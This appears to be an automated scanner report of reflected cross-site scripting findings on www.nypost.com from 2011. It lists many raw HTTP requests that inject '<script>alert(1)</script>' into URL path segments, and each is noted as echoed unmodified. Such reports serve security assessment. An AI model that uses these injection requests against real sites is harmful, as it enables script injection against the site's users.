GET /Resource/SysConfig/WebPortal/nypost/cssc4778<script>alert(1)</script>0dea580f227/styles.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 707 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:39:55 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 75522<script>alert(1)</script>c7a9fa5d639 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/css/styles.css75522<script>alert(1)</script>c7a9fa5d639 HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 707 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:00 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8fb78<script>alert(1)</script>fb8cae1f720 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig8fb78<script>alert(1)</script>fb8cae1f720/WebPortal/nypost/scripts/facebox/facebox.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 720 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:26 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d74e4<script>alert(1)</script>8df28f761c8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortald74e4<script>alert(1)</script>8df28f761c8/nypost/scripts/facebox/facebox.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 720 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:28 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 22ce5<script>alert(1)</script>4895d346a45 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost22ce5<script>alert(1)</script>4895d346a45/scripts/facebox/facebox.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 720 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:30 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 2d472<script>alert(1)</script>5e9a8efe6c3 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/scripts2d472<script>alert(1)</script>5e9a8efe6c3/facebox/facebox.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 720 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:32 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload f4463<script>alert(1)</script>c504fe1daa5 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/scripts/faceboxf4463<script>alert(1)</script>c504fe1daa5/facebox.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 720 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:34 GMT Connection: close
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload d9ac4<script>alert(1)</script>6329a42c9a8 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/scripts/facebox/facebox.cssd9ac4<script>alert(1)</script>6329a42c9a8 HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 720 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:36 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6abf0<script>alert(1)</script>9833a54d3c9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig6abf0<script>alert(1)</script>9833a54d3c9/WebPortal/nypost/blocks/_news/local/events/events.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 722 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:32:48 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6264a<script>alert(1)</script>696e2bc1cc2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal6264a<script>alert(1)</script>696e2bc1cc2/nypost/blocks/_news/local/events/events.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 722 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:32:53 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8f366<script>alert(1)</script>df71b8c9f2a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost8f366<script>alert(1)</script>df71b8c9f2a/blocks/_news/local/events/events.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 722 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:32:57 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c8c1d<script>alert(1)</script>32d06bf5a69 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocksc8c1d<script>alert(1)</script>32d06bf5a69/_news/local/events/events.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 722 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:00 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload eb69d<script>alert(1)</script>9e0774e7151 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks/_newseb69d<script>alert(1)</script>9e0774e7151/local/events/events.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 722 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:03 GMT Connection: close
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 190e2<script>alert(1)</script>89ab85f2b38 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks/_news/local190e2<script>alert(1)</script>89ab85f2b38/events/events.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 722 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:05 GMT Connection: close
The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload 60175<script>alert(1)</script>00356b5c361 was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks/_news/local/events60175<script>alert(1)</script>00356b5c361/events.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 722 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:07 GMT Connection: close
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 63628<script>alert(1)</script>3c754827f88 was submitted in the REST URL parameter 9. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks/_news/local/events/events.css63628<script>alert(1)</script>3c754827f88 HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 722 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:10 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a3177<script>alert(1)</script>4d8b9214769 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfiga3177<script>alert(1)</script>4d8b9214769/WebPortal/nypost/blocks/_news/local/events/events_home.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 727 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:32:57 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d7540<script>alert(1)</script>7aa64d2af5f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortald7540<script>alert(1)</script>7aa64d2af5f/nypost/blocks/_news/local/events/events_home.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 727 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:00 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6203c<script>alert(1)</script>338a0b0e394 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost6203c<script>alert(1)</script>338a0b0e394/blocks/_news/local/events/events_home.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 727 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:02 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 425ff<script>alert(1)</script>e4de40d6eda was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks425ff<script>alert(1)</script>e4de40d6eda/_news/local/events/events_home.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 727 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:04 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 5c27b<script>alert(1)</script>12645fa9bdf was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks/_news5c27b<script>alert(1)</script>12645fa9bdf/local/events/events_home.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 727 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:06 GMT Connection: close
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload fe9b2<script>alert(1)</script>5a8659b8a1f was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks/_news/localfe9b2<script>alert(1)</script>5a8659b8a1f/events/events_home.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 727 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:09 GMT Connection: close
The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload eea73<script>alert(1)</script>e2ffc83a0ff was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks/_news/local/eventseea73<script>alert(1)</script>e2ffc83a0ff/events_home.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 727 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:12 GMT Connection: close
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 16289<script>alert(1)</script>9173392b23a was submitted in the REST URL parameter 9. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks/_news/local/events/events_home.css16289<script>alert(1)</script>9173392b23a HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 727 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:14 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8ff6d<script>alert(1)</script>a394ae762 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig8ff6d<script>alert(1)</script>a394ae762/WebPortal/nypost/blocks/_news/local/events/local_events.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 725 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:32:57 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7e9ef<script>alert(1)</script>32942061662 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal7e9ef<script>alert(1)</script>32942061662/nypost/blocks/_news/local/events/local_events.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 727 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:00 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9d164<script>alert(1)</script>96fb840ef3b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost9d164<script>alert(1)</script>96fb840ef3b/blocks/_news/local/events/local_events.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 727 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:02 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 43523<script>alert(1)</script>917bd814d80 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks43523<script>alert(1)</script>917bd814d80/_news/local/events/local_events.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 727 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:05 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 874e6<script>alert(1)</script>5349f1df09d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks/_news874e6<script>alert(1)</script>5349f1df09d/local/events/local_events.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 727 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:06 GMT Connection: close
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload d6a5e<script>alert(1)</script>4d482c46305 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks/_news/locald6a5e<script>alert(1)</script>4d482c46305/events/local_events.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 727 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:09 GMT Connection: close
The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload 564c4<script>alert(1)</script>5026bd0f88f was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.
